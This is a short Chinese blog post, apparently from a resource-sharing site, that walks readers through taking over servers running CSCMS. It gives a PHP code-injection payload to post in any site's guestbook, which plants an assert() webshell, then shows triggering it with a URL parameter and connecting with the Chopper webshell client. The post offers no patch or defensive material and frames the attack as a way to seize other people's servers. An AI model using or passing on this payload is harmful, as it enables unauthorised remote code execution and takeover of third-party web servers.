一句留言直接拿小对发服务器教程

作者 : 七彩云 本文共261个字,预计阅读时间需要1分钟 发布时间: 2020-04-23 共1.12K人阅读

首先漏洞不是我本人找的,漏洞比较早了,是以前的CSCMS程式圆舞曲漏洞,我只是用本地搭建再一次复现这个用留言就能直接拿下对方服务器的漏洞

这个漏洞比较牛批了,就在留言板写一句话,就能直接getshell 菜刀链接,直接拿下服务器

接下来开始复现一下这个程式的漏洞。

在任意一个cms网站留言

这句话

{cscmsphp} assert($_REQUEST{a});{/csmcsphp}

留言完之后什么都没显示的话是正常的

然后用url直接穿参

?a=phpinfo();

然后用菜刀链接密码就是那个a如果没有菜刀的可以去我之前的文章看看里面有

如有侵权请提供相关证明到sjhyzwds@gmail.com
请加入官方QQ群1056114416
七彩云资源网 » 一句留言直接拿小对发服务器教程

发表评论